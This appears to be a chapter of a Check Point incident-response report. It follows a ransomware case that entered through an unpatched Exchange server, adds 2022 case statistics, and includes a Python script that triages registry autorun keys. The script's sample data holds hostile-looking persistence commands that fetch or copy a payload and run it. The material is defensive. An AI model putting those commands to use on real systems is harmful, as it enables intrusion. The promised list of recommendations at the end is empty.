*(Text on gray background describes events from a specific case investigated by CPIRT in 2022. Other text includes observations and data referring to all cases handled in 2022. Certain details have been modified to ensure customer confidentiality.)*

*On a Monday morning in March 2022, the Check Point Incident Response Team (CPIRT) received a call from a medium-sized European technology company which had been the victim of a Quantum Locker ransomware attack deployed early in the morning the day before. Robert, the company’s CISO, was on the line. Thus began a typical workday in the life of an IR analyst, which is often one of the worst days of the customer’s (professional) life.*
Unlike the analysis and trends discussed in previous chapters of this report, which are based on anonymized data collected by Check Point products during routine preventative protection, this chapter offers the perspective of the Check Point Incident Response Team, which provides attack mitigation services in response to various types of active breaches, to organizations that are not necessarily Check Point customers.
Robert reported that most of their data center servers, including the Domain Controllers and File Servers, had been encrypted and rendered non-functional. With no backups, their entire operation came to a halt and they were in need of assistance to investigate and mitigate this attack. CPIRT’s mission was to look for ongoing vulnerabilities and malicious activity, resume network functionality, and perform root cause analysis to identify the initial attack vector and prevent future attacks.
CPIRT involvement usually follows the discovery of visible malicious activity, such as encrypted files (ransomware), detection of spoofed or forged emails (email compromise), or the presence of malware files or unknown processes on a computer system. CPIRT’s breakdown of the initial threat indication therefore provides a different perspective on the threat landscape from the one routinely provided by our product data.
Analysis of the initial threat indications seen by CPIRT in 2022 shows that almost 50% of investigations involve ransomware infections. The threat breakdown above differs from what we see in our product data, which places multipurpose malware and infostealers at the top of the threat list. However, CPIRT data shows that the biggest risks visible from a large corporate perspective are full-blown ransomware attacks and full network compromises. Product telemetry that records multipurpose malware activity often captures only the initial incursion, which, if prevented, blocks much larger damage.
After the initial CPIRT forensic investigation, it became clear that the entry point to the organization was the company’s Exchange server. The server had not been patched and was vulnerable to two very popular exploit chains used by threat actors since 2021: the same group of vulnerabilities used by Hafnium (CVE-2021-26855, CVE-2021-26857 and CVE-2021-26858) and the ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207).
In almost half of CPIRT cases, the initial foothold is achieved by exploiting a server with an unpatched RCE vulnerability and ports open to the internet. In fact, the ProxyShell vulnerabilities alone were the cause of one in every six incidents CPIRT investigated in 2022, despite having been disclosed and patched in 2021.
An exposed RDP service is often used by attackers in combination with an RCE vulnerability or password attacks, such as brute force or credential stuffing, to gain a foothold in the network. Mail servers are often the weak link in a network: they are a common initial entry point for attackers and are also more easily encrypted, because, due to performance considerations, endpoint security and anti-ransomware products are frequently not installed on servers. Combined with the high number of vulnerabilities, network exposure and poor patch management, in many organizations it is the servers, not the peripheral endpoints, that are the weakest point, and they are therefore exploited in many attacks.
Further analysis revealed that the same vulnerable Exchange server had been exploited twice, in incidents nine months apart. The first exploitation of the server occurred in June 2021. Initially, “only” a cryptominer was installed, running on multiple assets across the network.
This emphasizes the need to treat every breach as seriously as a full-blown ransomware attack. As in this case, cryptominers and other “minor” malware types are often initial indicators of possible exploitation that could lead to cyber disasters later on.
Persistence in this attack was achieved by changing a registry key so that the machine periodically connected to and downloaded an external resource. Initially, this resource was a cryptominer installed on dozens of machines, but it could easily have been changed to another payload. By the end of the initial attack in mid-2021, the attackers had exfiltrated a list of the assets in the network and used Mimikatz to harvest credentials from the infected network. Some of the harvested credentials were NTLM hashes which, because simple passwords were in use, were easily cracked to recover the plaintext passwords.
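A defender-side triage of the persistence pattern described above, added here as an example (not CPIRT tooling): it parses `reg query`-style output of the Windows autorun (Run) keys and flags values whose command references a resource off the host, whether a URL or a UNC share. The assumption that the Run keys were the registry location used is ours; the value names, paths, hostnames and the `.invalid` domain are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample shaped like `reg query <key> /s` output (names, paths,
# the IP and the .invalid domain are all made up for this example).
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater    REG_EXPAND_SZ    %LOCALAPPDATA%\svc\loader.exe http://updates.example.invalid/payload.bin

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    SyncTask    REG_SZ    cmd.exe /c copy \\10.0.0.5\share\svc.exe %TEMP%\svc.exe && %TEMP%\svc.exe
"""

# Anything that points off the host: an http(s) URL or a UNC share path.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
UNC_RE = re.compile(r"\\\\[A-Za-z0-9.\-_]+\\[^\s\"']*")

@dataclass
class Finding:
    key: str        # registry key holding the autorun value
    name: str       # value name
    reg_type: str   # REG_SZ / REG_EXPAND_SZ
    reference: str  # the external resource found in the value data
    command: str    # full value data, for the analyst to review

def parse_reg_query(text: str):
    """Yield (key, name, type, data) from `reg query`-style text."""
    key = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw.startswith("HKEY_"):      # a key header line
            key = raw.strip()
            continue
        # reg query separates name / type / data with runs of spaces
        parts = re.split(r"\s{4,}", raw.strip(), maxsplit=2)
        if key is None or len(parts) != 3 or not parts[1].startswith("REG_"):
            continue                     # not a value line we understand
        yield key, parts[0], parts[1], parts[2]

def triage_autoruns(text: str) -> list[Finding]:
    """Return autorun values whose command references an external resource."""
    findings = []
    for key, name, reg_type, data in parse_reg_query(text):
        match = URL_RE.search(data) or UNC_RE.search(data)
        if match:
            findings.append(Finding(key, name, reg_type, match.group(0), data))
    return findings

if __name__ == "__main__":
    for f in triage_autoruns(SAMPLE_REG_QUERY):
        print(f"[!] {f.key}\\{f.name} ({f.reg_type}) -> {f.reference}")
```

On a real host the same function can be fed the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /s` (and the HKLM equivalent); a hit is a lead for analysis, not proof of compromise.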
CPIRT case statistics reveal extensive use by attackers of non-signature tools. The top tools used this year were Cobalt Strike and Mimikatz. However, for the first time, the third most popular tool in this list, AnyDesk, is a legitimate admin tool. As threat actors have started using more legitimate admin tools in their attacks, the use of customized malware built by the same threat actors has declined, and we are seeing an increase in attacks that might not include any malware at all.
This shift in the tools deployed by attackers is detailed in a dedicated chapter of this report.
During the second breach in March 2022, the attackers used the data retrieved nine months earlier. The asset list and credential dump stolen during the first attack were now used to enable and direct the ransomware deployment.
Stolen credentials and initial access to corporate networks are now often traded between threat actors or sold by “initial access brokers”. The outsourcing of more and more parts of the attack process, and the further fragmentation of the threat landscape, complicate attribution efforts. For these reasons, in many CPIRT cases in 2022, the attack was not attributed to a well-known or common threat group. We have also seen multiple malware families used in a single attack, for example the use of IcedID to deliver RansomEXX.
While the first attack went relatively unnoticed, the second attack resulted in the encryption of critical servers and ensuing serious damage. But there is a happy ending: at the end of a long, nerve-wracking process, thanks to CPIRT assistance, Robert was able to recover his company’s data and resume normal business activity.
This case is one of many dozens handled by CPIRT in 2022 that emphasize the critical importance of the following:
As Robert can attest, these actions prevent corporate catastrophes.